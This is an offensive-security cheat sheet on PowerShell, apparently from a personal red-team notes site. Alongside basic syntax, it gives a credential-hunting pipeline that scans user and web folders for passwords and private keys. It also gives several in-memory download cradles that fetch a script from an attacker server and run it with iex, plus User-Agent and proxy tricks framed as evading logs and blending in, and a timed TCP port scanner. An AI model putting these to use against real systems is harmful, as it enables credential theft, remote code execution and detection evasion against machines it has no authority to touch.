Johnermac

PowerShell

PowerShell is a powerful scripting language and command-line shell developed by Microsoft for automating administrative tasks and managing computer systems.

Getting Started

% = ForEach-Object
$_ = the current pipeline object
example: 1,2,3,4 | % {$_+3}
result : 4,5,6,7
? = Where-Object
-eq = equal
-ne = not equal
-like = wildcard match (* and ?), -notlike negates it
-gt = greater than
-lt = less than
example: Get-Service | ? {$_.Status -ne "Running"}
select = Select-Object
example: Get-Service dhcp | select ServiceName,CanPauseAndContinue,DisplayName

sls = Select-String (the pattern is a regex, not a wildcard, so "pass*" only means "pas" followed by any number of "s")
example: ls -r <path> -File -Filter *.txt | %{ sls -Path $_.FullName -Pattern "pass" }
Modules:
$Env:PSModulePath
modules in these directories are auto-loaded the first time one of their commands is used (PowerShell 3.0+), no Import-Module needed

Get-Command -Module <module name>
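
The aliases and operators above, put together into a credential-hunting pipeline. This is an added example, not code from the original page; the search roots, file extensions and regex patterns are assumptions to adapt to the target, and the StartType property on Get-Service needs PowerShell 5 or later.

```powershell
# Added example: hunt for credentials with the aliases from this section
# (ls -r = Get-ChildItem -Recurse, ? = Where-Object, % = ForEach-Object,
#  sls = Select-String, select = Select-Object). Roots/patterns are assumptions.
$Roots    = @("$Env:USERPROFILE", 'C:\inetpub', 'C:\Users\Public')
$Ext      = '*.txt','*.ini','*.config','*.xml','*.ps1','*.bat','*.json'
$Patterns = 'password\s*=', 'pwd\s*=', 'connectionstring', 'BEGIN (RSA|OPENSSH) PRIVATE KEY'

# -Include only filters files when combined with -Recurse; sls gets a regex array,
# case-insensitive by default, and -Context 0,1 keeps the line after each hit
$hits = ls -r $Roots -File -Include $Ext -ErrorAction SilentlyContinue |
    ? { $_.Length -lt 5MB } |                       # skip large logs and binaries
    % { sls -Path $_.FullName -Pattern $Patterns -Context 0,1 -ErrorAction SilentlyContinue } |
    select Path, LineNumber, @{n='Match'; e={ $_.Line.Trim() }}

# Drop the directories that are almost always noise; -notlike is the negated wildcard match
$hits |
    ? { $_.Path -notlike '*\node_modules\*' -and $_.Path -notlike '*\AppData\Local\Microsoft\*' } |
    Sort-Object Path | Format-Table -AutoSize

# Same ?/-ne/-eq idiom on services: stopped, but configured to start at boot
Get-Service | ? { $_.Status -ne 'Running' -and $_.StartType -eq 'Automatic' } |
    select Name, DisplayName, StartType
```

Keep the 5MB filter: Select-String reads every matching file completely, and a single multi-gigabyte IIS log under C:\inetpub will stall the whole pipeline.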

Download Files

// A summary of methods we can use for "In-Memory" execution with PowerShell 2.0:
> Net.WebClient DownloadString Method
> Net.WebClient DownloadData Method
> Net.WebClient OpenRead Method
> .NET [Net.HttpWebRequest] class
> Word.Application COM Object
> Excel.Application COM Object
> InternetExplorer.Application COM Object
> MsXml2.ServerXmlHttp COM Object
> Certutil.exe w/ -ping argument

// A summary of methods we can use for "Disk-Based" execution with PowerShell 2.0:
> Net.WebClient DownloadFile method
> BITSAdmin.exe
> Certutil.exe w/ -urlcache argument

Some Examples:

New-Object:

$variable = New-Object System.Net.WebClient
$variable | gm   //gm = Get-Member
$address= "<web server/file>"
$path = "<full path/file>"
$variable.DownloadFile($address,$path)

Invoke-Expression:

iex $variable.DownloadString($address)
//DownloadString takes only the URL and returns the body as a string; iex = Invoke-Expression then runs that string as PowerShell, so nothing is written to disk

System.xml.XmlDocument:

First, on Kali, serve an XML file from a web server:

<?xml version="1.0"?>
<command>
  <a>
    <execute>Set-ExecutionPolicy Bypass -Force -Scope CurrentUser</execute>
  </a>
  <b>
    <execute>Get-Process</execute>
  </b>
</command>
// On Target:
Target>
$docxml = New-Object System.Xml.XmlDocument
$docxml.Load("http://ip/arquivo.xml"); 
iex $docxml.command.a.execute 

+Stealthy

Specify headers when downloading files, for example the User-Agent (the value is whatever you want the web server and any proxy logs to record):

$variable.Headers.Add("user-agent","redteam")
iex $variable.DownloadString($address)
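
The download cradles from the list above (WebClient, HttpWebRequest, the MsXml2.ServerXmlHttp COM object and the XmlDocument trick), each with a custom User-Agent and the system proxy. This is an added example, not code from the original page; the staging URL is an assumption, the function names are illustrative, and the TLS 1.2 line needs .NET 4.5 or newer (PowerShell 2.0 on .NET 3.5 does not have it).

```powershell
# Added example: several in-memory download cradles with headers set.
# $Url is an assumed attacker web server; function names are illustrative.
$Url = 'http://10.10.10.10/stage.ps1'
$UA  = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'   # blend in rather than "redteam"

# Allow TLS 1.2 for HTTPS stagers (.NET 4.5+). Going through the system proxy
# with the user's credentials makes the request look like normal browsing.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

function Get-ViaWebClient ($Url) {
    $wc = New-Object Net.WebClient
    $wc.Proxy = [Net.WebRequest]::GetSystemWebProxy()
    $wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
    $wc.Headers.Add('User-Agent', $UA)
    $wc.DownloadString($Url)                  # only the URL; returns the body as a string
}

function Get-ViaHttpWebRequest ($Url) {
    $req = [Net.HttpWebRequest]::Create($Url)
    $req.UserAgent = $UA
    $req.Proxy = [Net.WebRequest]::GetSystemWebProxy()
    $resp = $req.GetResponse()
    $rd = New-Object IO.StreamReader($resp.GetResponseStream())
    try { $rd.ReadToEnd() } finally { $rd.Close(); $resp.Close() }
}

function Get-ViaServerXmlHttp ($Url) {
    # COM object: the HTTP request is issued by msxml, not by System.Net
    $x = New-Object -ComObject MsXml2.ServerXmlHttp
    $x.Open('GET', $Url, $false)
    $x.SetRequestHeader('User-Agent', $UA)
    $x.Send()
    $x.ResponseText
}

function Invoke-XmlCommandList ($Url) {
    # The XmlDocument trick above, but running every <execute> node in order
    $doc = New-Object Xml.XmlDocument
    $doc.Load($Url)                           # Load() accepts an http URL directly
    foreach ($node in $doc.command.ChildNodes) { iex $node.execute }
}

# Use whichever cradle is not blocked or inspected, then run the script from memory
$code = Get-ViaWebClient $Url
iex $code
```

Each cradle leaves a different footprint: the .NET ones run inside powershell.exe and show up in script block logging once iex runs, the COM one adds an msxml3/msxml6 load to the process, and XmlDocument.Load fetches over HTTP with its own default User-Agent unless you go through a pre-configured XmlResolver.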

Some usage examples

Count the cmdlets with "process" in their name:

Get-Command *process* -CommandType cmdlet | Measure-Object

Count the cmdlets whose verb is Set:

(Get-Command -CommandType cmdlet -Verb Set).Count

4th process by working-set memory (Select-Object -Index is zero-based):

ps | Sort-Object -Property WS -Descending | Select-Object -Index 3

Simple port scan (Connect throws on closed ports, 2>$null hides those errors; filtered ports block for the full TCP timeout):

1..1024 | %{echo ((new-object Net.Sockets.TcpClient).Connect("IP",$_)) "Port $_ is open"} 2>$null
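
The one-liner above hangs for the whole TCP timeout on every filtered port, so a firewalled host makes 1024 ports take many minutes. An added example, not code from the original page, that uses BeginConnect with a per-port deadline; the target address is an assumption and the function name is illustrative.

```powershell
# Added example: TCP connect scan with a per-port timeout so filtered ports
# do not stall the loop. Target/ports/timeout are assumptions for the demo.
function Test-TcpPorts {
    param(
        [Parameter(Mandatory)][string]$Target,
        [int[]]$Ports = 1..1024,
        [int]$TimeoutMs = 300
    )
    foreach ($p in $Ports) {
        $client = New-Object Net.Sockets.TcpClient
        try {
            $ar = $client.BeginConnect($Target, $p, $null, $null)
            # WaitOne returns $false when the deadline passes (filtered/dropped);
            # a refused connection completes quickly with Connected = $false
            if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false) -and $client.Connected) {
                $client.EndConnect($ar)
                [pscustomobject]@{ Target = $Target; Port = $p; State = 'open' }
            }
        } catch {
            # EndConnect/BeginConnect exceptions (refused, unreachable, bad name): not open
        } finally {
            $client.Close()
        }
    }
}

# Usage with an assumed target; add the extras you care about beyond 1-1024
Test-TcpPorts -Target 10.10.10.10 -Ports ((1..1024) + @(3389,5985,8080)) |
    Format-Table -AutoSize
```

Raise TimeoutMs over slow VPN or pivot links, otherwise open ports that take longer than the deadline to complete the handshake are reported as closed.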
